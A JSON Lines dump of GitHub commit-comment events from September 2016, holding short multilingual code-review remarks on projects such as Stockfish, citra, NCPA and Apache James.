{"id":"4532039886","type":"CommitCommentEvent","actor":{"login":"jtara1"},"repo":{"name":"jtara1/MediaToVideo"},"payload":{"comment":{"id":18940114,"position":null,"line":null,"path":null,"commit_id":"f7c693387ceab0b1d9d38112e7a592ce40b547dc","created_at":"2016-09-08T06:20:11Z","updated_at":"2016-09-08T06:20:11Z","body":"The remove_audio parameter in GetMedia.get_all(...) function is actually redundant since removing 'Audio' from track_types param list achieves the same thing."}},"created_at":"2016-09-08T06:20:11Z"}
{"id":"4532053366","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940132,"position":12,"line":11,"path":"appveyor.yml","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:24:33Z","updated_at":"2016-09-08T06:24:33Z","body":"No problem. Just trying to help out.\r\nWill test out the new installer later when I have time.\r\nI will give feedback and see what can be improve on."}},"created_at":"2016-09-08T06:24:33Z"}
{"id":"4532057090","type":"CommitCommentEvent","actor":{"login":"FreeDemons"},"repo":{"name":"FreeDemons/test"},"payload":{"comment":{"id":18940137,"position":3,"line":3,"path":"test.txt","commit_id":"2ee6f95a6b94c5dd4a5b26634aac69c3fe149bd5","created_at":"2016-09-08T06:25:42Z","updated_at":"2016-09-08T06:25:42Z","body":"测试4"}},"created_at":"2016-09-08T06:25:42Z"}
{"id":"4532058054","type":"CommitCommentEvent","actor":{"login":"jroweboy"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940139,"position":12,"line":11,"path":"appveyor.yml","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:26:00Z","updated_at":"2016-09-08T06:26:00Z","body":"@Dragios sounds good. I'm in the process of moving things over to the citra-emu organization on github, so I dunno how much of these changes i'll be able to use right now, since its going to be changing some more after the feedback from bunnei"}},"created_at":"2016-09-08T06:26:00Z"}
{"id":"4532077427","type":"CommitCommentEvent","actor":{"login":"berockguo"},"repo":{"name":"tencent-wechat/phxrpc"},"payload":{"comment":{"id":18940189,"position":33,"line":48,"path":"phxrpc/network/uthread_context_util.cpp","commit_id":"8e6e694183891c8c487d8db0d7812dab08def900","created_at":"2016-09-08T06:32:10Z","updated_at":"2016-09-08T06:32:10Z","body":"十分漂亮的实现，用mprotect保护协程上下的两块内存，保证栈内容不会被修改。"}},"created_at":"2016-09-08T06:32:10Z"}
{"id":"4532078144","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18940190,"position":89,"line":127,"path":"Part_II_Theory/21._reduction_of_spatial_convolution_by_fft.tex","commit_id":"e934da4eb3016706f0734cf4140247a8bae427ef","created_at":"2016-09-08T06:32:23Z","updated_at":"2016-09-08T06:32:23Z","body":"It's \"rotate\" I guess"}},"created_at":"2016-09-08T06:32:23Z"}
{"id":"4532080814","type":"CommitCommentEvent","actor":{"login":"mbootsector"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18940199,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-08T06:33:14Z","updated_at":"2016-09-08T06:33:14Z","body":"Congrats! :)"}},"created_at":"2016-09-08T06:33:14Z"}
{"id":"4532084984","type":"CommitCommentEvent","actor":{"login":"dpotikha"},"repo":{"name":"coderiver/agromat-shop"},"payload":{"comment":{"id":18940208,"position":17,"line":17,"path":"popup-questionnaire/index.html","commit_id":"74264b7ebab1a78f2c35a1fe91a07c00b43fac45","created_at":"2016-09-08T06:34:32Z","updated_at":"2016-09-08T06:34:32Z","body":"Нужна конструкция через тег <a>. вот базовые стили:\r\n<a href=\"##\" class=\"btn btn_large\" style=\"background-color:red; margin-right:10px\">Получить скидку 10%</a>"}},"created_at":"2016-09-08T06:34:32Z"}
{"id":"4532087582","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18940215,"position":41,"line":41,"path":"JSp1_3.php","commit_id":"9c31c97518cbf8841a5edca389e965d43561c2be","created_at":"2016-09-08T06:35:24Z","updated_at":"2016-09-08T06:35:24Z","body":"this is good\r\n"}},"created_at":"2016-09-08T06:35:24Z"}
{"id":"4532088338","type":"CommitCommentEvent","actor":{"login":"Cathyusyd"},"repo":{"name":"Cathyusyd/hello-world"},"payload":{"comment":{"id":18940218,"position":41,"line":41,"path":"JSp1_3.php","commit_id":"9c31c97518cbf8841a5edca389e965d43561c2be","created_at":"2016-09-08T06:35:38Z","updated_at":"2016-09-08T06:35:38Z","body":"hello"}},"created_at":"2016-09-08T06:35:38Z"}
{"id":"4532088635","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":18940219,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-08T06:35:43Z","updated_at":"2016-09-08T06:35:43Z","body":"Why do this?"}},"created_at":"2016-09-08T06:35:43Z"}
{"id":"4532089614","type":"CommitCommentEvent","actor":{"login":"rassokhin-s"},"repo":{"name":"rfcx/web-components"},"payload":{"comment":{"id":18940222,"position":null,"line":null,"path":null,"commit_id":"dea96861c99934116a790e5dd9fd63af9fb6c88f","created_at":"2016-09-08T06:36:03Z","updated_at":"2016-09-08T06:36:03Z","body":"@pradyumnad karma is listed in `package.json`. Have you run `npm install`?"}},"created_at":"2016-09-08T06:36:03Z"}
{"id":"4532092809","type":"CommitCommentEvent","actor":{"login":"jomann09"},"repo":{"name":"NagiosEnterprises/ncpa"},"payload":{"comment":{"id":18940229,"position":null,"line":null,"path":null,"commit_id":"9e4eeb7f337f12ef87321d0a73ca9f5d05f810fd","created_at":"2016-09-08T06:37:03Z","updated_at":"2016-09-08T06:37:03Z","body":"As a note; this commit only added the `def demote` and then added into `subprocess.Popen` along with giving a better description in the ncpa.cfg about what the uid/gid were for."}},"created_at":"2016-09-08T06:37:03Z"}
{"id":"4532093117","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":18940230,"position":5,"line":0,"path":"app/controllers/league_controller.rb","commit_id":"8e88f82ffb6c2fa027a6510773f49f91e4a78715","created_at":"2016-09-08T06:37:10Z","updated_at":"2016-09-08T06:37:10Z","body":"Cleanup required to remove comments"}},"created_at":"2016-09-08T06:37:10Z"}
{"id":"4532093970","type":"CommitCommentEvent","actor":{"login":"jomann09"},"repo":{"name":"NagiosEnterprises/ncpa"},"payload":{"comment":{"id":18940232,"position":191,"line":53,"path":"agent/listener/pluginnodes.py","commit_id":"9e4eeb7f337f12ef87321d0a73ca9f5d05f810fd","created_at":"2016-09-08T06:37:24Z","updated_at":"2016-09-08T06:37:24Z","body":"53 - 55 was added"}},"created_at":"2016-09-08T06:37:24Z"}
{"id":"4532094683","type":"CommitCommentEvent","actor":{"login":"jomann09"},"repo":{"name":"NagiosEnterprises/ncpa"},"payload":{"comment":{"id":18940234,"position":205,"line":67,"path":"agent/listener/pluginnodes.py","commit_id":"9e4eeb7f337f12ef87321d0a73ca9f5d05f810fd","created_at":"2016-09-08T06:37:37Z","updated_at":"2016-09-08T06:37:37Z","body":"67 - 70 was added"}},"created_at":"2016-09-08T06:37:37Z"}
{"id":"4532095157","type":"CommitCommentEvent","actor":{"login":"jomann09"},"repo":{"name":"NagiosEnterprises/ncpa"},"payload":{"comment":{"id":18940235,"position":231,"line":93,"path":"agent/listener/pluginnodes.py","commit_id":"9e4eeb7f337f12ef87321d0a73ca9f5d05f810fd","created_at":"2016-09-08T06:37:46Z","updated_at":"2016-09-08T06:37:46Z","body":"This function was added"}},"created_at":"2016-09-08T06:37:46Z"}
{"id":"4532095583","type":"CommitCommentEvent","actor":{"login":"Kingdefender"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":18940236,"position":null,"line":null,"path":null,"commit_id":"d909d10f33df023be46a2633608bdf655d1f5a62","created_at":"2016-09-08T06:37:53Z","updated_at":"2016-09-08T06:37:53Z","body":"Congratulations to Ajith!\r\n\r\nI had one small comment on the indents here 923-925 Marco\r\n```\r\n+      if (  !rootNode\r\n+         && !inCheck\r\n+         &&  bestValue > VALUE_MATED_IN_MAX_PLY)\r\n```\r\nI think the && are one space too far to the left.. Can you still correct it? "}},"created_at":"2016-09-08T06:37:53Z"}
{"id":"4532095834","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":18940238,"position":4,"line":0,"path":"Gemfile","commit_id":"8e88f82ffb6c2fa027a6510773f49f91e4a78715","created_at":"2016-09-08T06:37:58Z","updated_at":"2016-09-08T06:37:58Z","body":"Lower version required to support Puma"}},"created_at":"2016-09-08T06:37:58Z"}
{"id":"4532096167","type":"CommitCommentEvent","actor":{"login":"jomann09"},"repo":{"name":"NagiosEnterprises/ncpa"},"payload":{"comment":{"id":18940239,"position":240,"line":19,"path":"agent/etc/ncpa.cfg","commit_id":"9e4eeb7f337f12ef87321d0a73ca9f5d05f810fd","created_at":"2016-09-08T06:38:04Z","updated_at":"2016-09-08T06:38:04Z","body":"This note was added"}},"created_at":"2016-09-08T06:38:04Z"}
{"id":"4532096283","type":"CommitCommentEvent","actor":{"login":"rks92"},"repo":{"name":"rks92/LPC"},"payload":{"comment":{"id":18940240,"position":16,"line":0,"path":"Gemfile","commit_id":"8e88f82ffb6c2fa027a6510773f49f91e4a78715","created_at":"2016-09-08T06:38:07Z","updated_at":"2016-09-08T06:38:07Z","body":"Cleanup"}},"created_at":"2016-09-08T06:38:07Z"}
{"id":"4532097397","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18940246,"position":231,"line":431,"path":".idea/workspace.xml","commit_id":"9f2ae69d20b7d125ac938c51fbdc03b14eb8df86","created_at":"2016-09-08T06:38:26Z","updated_at":"2016-09-08T06:38:26Z","body":"@nurzynskipawel po co wrzucasz plik do repozytorium, który nie ma wartości :)?\r\nSkorzystaj z możliwości wykluczania danych katalogów w repozytorium przez `.gitignore` (przykład znajdziesz w repo GL).\r\n\r\nDlaczego wykluczamy niektóre katalogi? Bo w wielu przypadkach są one różne od środowiska dewelopera i nie mają wpływu na działanie aplikacji.\r\nTakie katalogi to np:\r\n- `app/cache` - bo po co mieć cache w repo\r\n- `.idea` - katalog projektu PHPStorma, też nikomu nie potrzebny w zdalnym repo"}},"created_at":"2016-09-08T06:38:26Z"}
{"id":"4532100369","type":"CommitCommentEvent","actor":{"login":"kirjakov"},"repo":{"name":"kirjakov/kuruchin"},"payload":{"comment":{"id":18940247,"position":1,"line":1,"path":"README.md","commit_id":"d6c70a1c4e16ed66cebf7af34503ca42e1227c56","created_at":"2016-09-08T06:39:18Z","updated_at":"2016-09-08T06:39:18Z","body":"blablabla"}},"created_at":"2016-09-08T06:39:18Z"}
{"id":"4532102133","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18940251,"position":102,"line":36,"path":"README.md","commit_id":"9f2ae69d20b7d125ac938c51fbdc03b14eb8df86","created_at":"2016-09-08T06:39:49Z","updated_at":"2016-09-08T06:39:49Z","body":"A co to jest? po co informacja o `goldenline` w repozytorium Twojej aplikacji? \r\nDo usunięcia"}},"created_at":"2016-09-08T06:39:49Z"}
{"id":"4532103756","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18940257,"position":124,"line":58,"path":"README.md","commit_id":"9f2ae69d20b7d125ac938c51fbdc03b14eb8df86","created_at":"2016-09-08T06:40:17Z","updated_at":"2016-09-08T06:40:17Z","body":"To również do usunięcia"}},"created_at":"2016-09-08T06:40:17Z"}
{"id":"4532105027","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18940258,"position":152,"line":86,"path":"README.md","commit_id":"9f2ae69d20b7d125ac938c51fbdc03b14eb8df86","created_at":"2016-09-08T06:40:40Z","updated_at":"2016-09-08T06:40:40Z","body":"👍 "}},"created_at":"2016-09-08T06:40:40Z"}
{"id":"4532105046","type":"CommitCommentEvent","actor":{"login":"tonyandrewmeyer"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18940259,"position":165,"line":165,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-08T06:40:40Z","updated_at":"2016-09-08T06:40:40Z","body":"I guess the most appropriate thing to do would be to have them in the config file :smile:. But yes, AT or SU themed ones would be fun, although I wonder if enough people would understand."}},"created_at":"2016-09-08T06:40:40Z"}
{"id":"4532105292","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18940260,"position":150,"line":84,"path":"README.md","commit_id":"9f2ae69d20b7d125ac938c51fbdc03b14eb8df86","created_at":"2016-09-08T06:40:44Z","updated_at":"2016-09-08T06:40:44Z","body":"👍 "}},"created_at":"2016-09-08T06:40:44Z"}
{"id":"4532107297","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18940263,"position":167,"line":101,"path":"README.md","commit_id":"9f2ae69d20b7d125ac938c51fbdc03b14eb8df86","created_at":"2016-09-08T06:41:22Z","updated_at":"2016-09-08T06:41:22Z","body":"Sama deklaracja serwera dla Twojego projektu jest **ok** :)"}},"created_at":"2016-09-08T06:41:22Z"}
{"id":"4532107443","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":18940264,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-08T06:41:25Z","updated_at":"2016-09-08T06:41:25Z","body":"Why do this?"}},"created_at":"2016-09-08T06:41:25Z"}
{"id":"4532111389","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaOpt/Mosek.jl"},"payload":{"comment":{"id":18940273,"position":7,"line":9,"path":"deps/build.jl","commit_id":"c471393eb3e61ee7749e0ea2a0fc909c5eaee1db","created_at":"2016-09-08T06:42:32Z","updated_at":"2016-09-08T06:42:32Z","body":"You don't need to have a 32 bit OS to run 32 bit binaries of Julia, you can run win32 Julia on 64 bit Windows, and linux 32 Julia on 64 bit Linux."}},"created_at":"2016-09-08T06:42:32Z"}
{"id":"4532112212","type":"CommitCommentEvent","actor":{"login":"tzerrell"},"repo":{"name":"MoreEventsMod/More_Events_Mod_Beta"},"payload":{"comment":{"id":18940276,"position":null,"line":null,"path":null,"commit_id":"1fad449c167a46e95457b4b78a5ed364bb4b95e8","created_at":"2016-09-08T06:42:47Z","updated_at":"2016-09-08T06:42:47Z","body":"@asnys Do you want the deposit created in this event to use a research station? Or are you intentionally using a mining station for society research?"}},"created_at":"2016-09-08T06:42:47Z"}
{"id":"4532113046","type":"CommitCommentEvent","actor":{"login":"Maxfashko"},"repo":{"name":"peeerrrooo/py_les"},"payload":{"comment":{"id":18940278,"position":null,"line":null,"path":null,"commit_id":"fa78faeebe634910a81aa226eb6339532e29c9db","created_at":"2016-09-08T06:43:02Z","updated_at":"2016-09-08T06:43:02Z","body":"Чтож ты забыл, что в python v2* нет юникода? Это к примерам запуска скпиптов:\r\npython format.py\r\npython3 format.py"}},"created_at":"2016-09-08T06:43:02Z"}
{"id":"4532114677","type":"CommitCommentEvent","actor":{"login":"lela-null"},"repo":{"name":"lela-null/internet-shit"},"payload":{"comment":{"id":18940279,"position":null,"line":null,"path":null,"commit_id":"72e48ca6b44c30c44393ad096554e5930f026a7e","created_at":"2016-09-08T06:43:33Z","updated_at":"2016-09-08T06:43:33Z","body":"Thank you for your interest in downloading Internet Shit!\r\nFirst things first is that this project will contain NSFW content.\r\n\r\nThese files do not contain the \"database\", you can download that [here](http://www.mediafire.com/download/uci53kvfvbpehc0/database_v6.0.zip)\r\nhttp://www.mediafire.com/download/uci53kvfvbpehc0/database_v6.0.zip\r\n\r\nAfter download you may put the database in the directory:\r\n/internet-shit/files/database/"}},"created_at":"2016-09-08T06:43:33Z"}
{"id":"4532114819","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18940280,"position":null,"line":null,"path":null,"commit_id":"21b0f5236d2741c1202fa4c9d98ec6d619d6414d","created_at":"2016-09-08T06:43:35Z","updated_at":"2016-09-08T06:43:35Z","body":"I think that you could use `attacks_from(pc, to)` instead of 'attacks'"}},"created_at":"2016-09-08T06:43:35Z"}
{"id":"4532115883","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Mongo2Go/Mongo2Go"},"payload":{"comment":{"id":18940283,"position":null,"line":null,"path":null,"commit_id":"816229292dd29d726e4d4e7517e3e851eaef6b7c","created_at":"2016-09-08T06:43:54Z","updated_at":"2016-09-08T06:43:54Z","body":"Looks like we can mark 1.0 as stable, even without any solution for #17 and #19 ! :smile:"}},"created_at":"2016-09-08T06:43:54Z"}
{"id":"4532119943","type":"CommitCommentEvent","actor":{"login":"Mofla"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":18940287,"position":null,"line":null,"path":null,"commit_id":"b531cf27d09c43dcdf2eaee05a659166beaee1b6","created_at":"2016-09-08T06:45:06Z","updated_at":"2016-09-08T06:45:06Z","body":"Bonjour, \r\nPour la gestion de la quantité de Materials je suis d'accord c'est plus simple avec une gestion de quantité avec un champ mais je me suis tenu en fait à la BDD comme elle avait été décidée par tout le monde. Mais du coup ça me rassure dans mon idée et je vais changer la BDD et le code en fonction."}},"created_at":"2016-09-08T06:45:06Z"}
{"id":"4532120531","type":"CommitCommentEvent","actor":{"login":"voelzmo"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":18940289,"position":null,"line":null,"path":null,"commit_id":"3f55789f2fad91380a2cc7d432a73f084b4b79ae","created_at":"2016-09-08T06:45:17Z","updated_at":"2016-09-08T06:45:17Z","body":"@tylerschultz Thanks for fixing this, I guess it should be fine. Sorry for missing this, I realized that Rupa and Danny [had done the same thing on develop](https://github.com/cloudfoundry/bosh/commit/91b3c4922f26c89fd7999d01afb301527c94c27d) already after our initial PR.\r\n\r\nHab' einen schönen Tag! Bis bald! :) "}},"created_at":"2016-09-08T06:45:17Z"}
{"id":"4532121141","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18940290,"position":13,"line":208,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/StoreMailboxManager.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T06:45:27Z","updated_at":"2016-09-08T06:45:27Z","body":"you are supposed to declare `Session session = null;` to express the intent"}},"created_at":"2016-09-08T06:45:27Z"}
{"id":"4532122385","type":"CommitCommentEvent","actor":{"login":"kaki88"},"repo":{"name":"eBrigade/eBrigadeV2"},"payload":{"comment":{"id":18940294,"position":null,"line":null,"path":null,"commit_id":"b531cf27d09c43dcdf2eaee05a659166beaee1b6","created_at":"2016-09-08T06:45:49Z","updated_at":"2016-09-08T06:45:49Z","body":"Bonjour,\r\n\r\nPour la gestion de barracks je ne vois pas du tout quelle \"valeur\" doit etre inserer dans l'arborescence ...j'ai cherché du coté de l'ebrigade existant et dans sa bdd mais je ne trouves pas...pouvez vous m'aiguillez svp? merci"}},"created_at":"2016-09-08T06:45:49Z"}
{"id":"4532125299","type":"CommitCommentEvent","actor":{"login":"mbaechler"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18940299,"position":46,"line":46,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/event/MailboxAnnotationListener.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T06:46:41Z","updated_at":"2016-09-08T06:46:41Z","body":"I understand the intent but I ask about consequences : you will have eventual consistency for your operation, is that what you functionally want ? is there any downside ?"}},"created_at":"2016-09-08T06:46:41Z"}
{"id":"4532125631","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18940301,"position":38,"line":45,"path":"Part_II_Theory/22._angular_convolution_a_better_algorithm.tex","commit_id":"da5cea54267f03d439c0d2ee45831dc7d2dc9424","created_at":"2016-09-08T06:46:47Z","updated_at":"2016-09-08T06:46:47Z","body":"expanded indeed. In French \"en\" and \"an\" is the same pronunciation, I have always this problem... Thanks T_T"}},"created_at":"2016-09-08T06:46:47Z"}
{"id":"4532129644","type":"CommitCommentEvent","actor":{"login":"ivanmuniz"},"repo":{"name":"gonzalorodrigo/osxcalendarwidget"},"payload":{"comment":{"id":18940305,"position":null,"line":null,"path":null,"commit_id":"e44cd39dd782105e01f312b704ab87da8c782dfe","created_at":"2016-09-08T06:48:02Z","updated_at":"2016-09-08T06:48:02Z","body":"My weather widget works fine now, thank you!"}},"created_at":"2016-09-08T06:48:02Z"}
{"id":"4532131790","type":"CommitCommentEvent","actor":{"login":"schererc"},"repo":{"name":"votca/csg"},"payload":{"comment":{"id":18940308,"position":26,"line":469,"path":"share/xml/csg_defaults.xml.in","commit_id":"9b46a942f01bbe3ea406a5b155b7e168a0facce0","created_at":"2016-09-08T06:48:42Z","updated_at":"2016-09-08T06:48:42Z","body":"You are right. I removed these lines.\n\n2016-09-07 17:35 GMT+02:00 Christoph Junghans <notifications@github.com>:\n\n> @schererc <https://github.com/schererc>: Is is wrong! You made <dist> an\n> global option, not a interaction option, so remove these 3 lines again.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/votca/csg/commit/9b46a942f01bbe3ea406a5b155b7e168a0facce0#commitcomment-18930363>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALlqQDfcB4OtulGMUAe55VU_UdaccOycks5qntnDgaJpZM4J3DzO>\n> .\n>\n"}},"created_at":"2016-09-08T06:48:42Z"}
{"id":"4532132448","type":"CommitCommentEvent","actor":{"login":"rubysoho07"},"repo":{"name":"rubysoho07/MusicManager"},"payload":{"comment":{"id":18940310,"position":null,"line":null,"path":null,"commit_id":"59cfca56e2fbb35b9a5221958c24d4a4ff3ea712","created_at":"2016-09-08T06:48:56Z","updated_at":"2016-09-08T06:48:56Z","body":"If you set DEBUG is False, you can see that local server work abnormally when you run 'runserver' command on local system."}},"created_at":"2016-09-08T06:48:56Z"}
{"id":"4532140625","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":18940331,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-08T06:51:23Z","updated_at":"2016-09-08T06:51:23Z","body":"Why do this?"}},"created_at":"2016-09-08T06:51:23Z"}
{"id":"4532144676","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940338,"position":8,"line":8,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:52:35Z","updated_at":"2016-09-08T06:52:35Z","body":"Set a title."}},"created_at":"2016-09-08T06:52:35Z"}
{"id":"4532145200","type":"CommitCommentEvent","actor":{"login":"peeerrrooo"},"repo":{"name":"peeerrrooo/py_les"},"payload":{"comment":{"id":18940340,"position":null,"line":null,"path":null,"commit_id":"fa78faeebe634910a81aa226eb6339532e29c9db","created_at":"2016-09-08T06:52:46Z","updated_at":"2016-09-08T06:52:46Z","body":"было написано условия запуска: Python v3\r\nв Win по дефолту запускается через python\r\nв Unix, да, по умолчанию обычно стоит v2.x, поэтому при установке 3 версии, запуск интерпретатор происходит через команду python3 как правило - /usr/bin/python3 или /usr/bin/python3.5 если уже несколько версия 3 ветки."}},"created_at":"2016-09-08T06:52:46Z"}
{"id":"4532145587","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940341,"position":13,"line":13,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:52:52Z","updated_at":"2016-09-08T06:52:52Z","body":"Put the github link for now."}},"created_at":"2016-09-08T06:52:52Z"}
{"id":"4532145910","type":"CommitCommentEvent","actor":{"login":"nandika"},"repo":{"name":"wso2/product-pc"},"payload":{"comment":{"id":18940342,"position":4,"line":23,"path":"modules/components/analytics/core/kpi/org.wso2.carbon.pc.analytics.core.kpi/src/main/java/org/wso2/carbon/pc/analytics/core/kpi/AnalyticsConfigConstants.java","commit_id":"c1ff195b49564a1f34aa4d16ffff1b96a87c7ee5","created_at":"2016-09-08T06:52:58Z","updated_at":"2016-09-08T06:52:58Z","body":"This constant name does not sound nice. Change this to \"IsDASConfigured\""}},"created_at":"2016-09-08T06:52:58Z"}
{"id":"4532148307","type":"CommitCommentEvent","actor":{"login":"shinesoftware"},"repo":{"name":"NewtonsNerds/GoalioForgotPassword"},"payload":{"comment":{"id":18940345,"position":null,"line":null,"path":null,"commit_id":"e6d308b6ae68d2ddf31d6bad95d5800ac06fa113","created_at":"2016-09-08T06:53:40Z","updated_at":"2016-09-08T06:53:40Z","body":"This commit doesn't solve the problem.\r\nI get this error: While attempting to create goalioforgotpasswordforgotform(alias: goalioforgotpassword_forgot_form) an invalid factory was registered for this instance type.\r\n\r\nthanks"}},"created_at":"2016-09-08T06:53:40Z"}
{"id":"4532153022","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940353,"position":21,"line":21,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:55:03Z","updated_at":"2016-09-08T06:55:03Z","body":"Not limited to inspectors. Suggest to use \"components\" instead."}},"created_at":"2016-09-08T06:55:03Z"}
{"id":"4532153649","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18940356,"position":136,"line":193,"path":"Part_II_Theory/22._angular_convolution_a_better_algorithm.tex","commit_id":"da5cea54267f03d439c0d2ee45831dc7d2dc9424","created_at":"2016-09-08T06:55:15Z","updated_at":"2016-09-08T06:55:15Z","body":"The same, it is a polynomial of both cos theta, cos phi and cos psi."}},"created_at":"2016-09-08T06:55:15Z"}
{"id":"4532156501","type":"CommitCommentEvent","actor":{"login":"quynhn"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":18940360,"position":13,"line":208,"path":"mailbox/store/src/main/java/org/apache/james/mailbox/store/StoreMailboxManager.java","commit_id":"99e2d57fdc575a03e65760fc29751b3829511092","created_at":"2016-09-08T06:56:01Z","updated_at":"2016-09-08T06:56:01Z","body":"OK"}},"created_at":"2016-09-08T06:56:01Z"}
{"id":"4532157415","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940363,"position":23,"line":23,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:56:15Z","updated_at":"2016-09-08T06:56:15Z","body":"maintaince => maintain"}},"created_at":"2016-09-08T06:56:15Z"}
{"id":"4532159472","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940365,"position":25,"line":25,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:56:51Z","updated_at":"2016-09-08T06:56:51Z","body":"better extensibility"}},"created_at":"2016-09-08T06:56:51Z"}
{"id":"4532161543","type":"CommitCommentEvent","actor":{"login":"Binaryvector"},"repo":{"name":"Binaryvector/HarvestMap"},"payload":{"comment":{"id":18940370,"position":18,"line":83,"path":"HarvestMap/DB/HarvestDbController.lua","commit_id":"3502aa1ec8b8edd109431db11b437d4390896365","created_at":"2016-09-08T06:57:25Z","updated_at":"2016-09-08T06:57:25Z","body":"iir there was some discussion on gitter or on the esoui forum about using the global namespace and the conclusion was to have a minimal impact on it. If every addon would add lots of global variables the access would be slowed down. I'm not sure how true this is (like is the read access O(1) or O(log n)?). I essentially added this to please the other addon devs."}},"created_at":"2016-09-08T06:57:25Z"}
{"id":"4532162143","type":"CommitCommentEvent","actor":{"login":"lin-d-hop"},"repo":{"name":"openfoodfoundation/openfoodnetwork"},"payload":{"comment":{"id":18940372,"position":null,"line":null,"path":null,"commit_id":"e5afdb5bf41a1138706c53ae18e843358ccb1b63","created_at":"2016-09-08T06:57:35Z","updated_at":"2016-09-08T06:57:35Z","body":"@oeoeaio d'oh, not sure how that happened! Sorry!!"}},"created_at":"2016-09-08T06:57:35Z"}
{"id":"4532164117","type":"CommitCommentEvent","actor":{"login":"yujunz"},"repo":{"name":"openzero-zte/doctor"},"payload":{"comment":{"id":18940379,"position":30,"line":30,"path":"docs/doctor_test_script_refactor.rst","commit_id":"338d0bd063e4264e6f0e665a5cb270f110879853","created_at":"2016-09-08T06:58:09Z","updated_at":"2016-09-08T06:58:09Z","body":"not actually independent, since they will share many common methods and attributes. They should inherit a common parent."}},"created_at":"2016-09-08T06:58:09Z"}
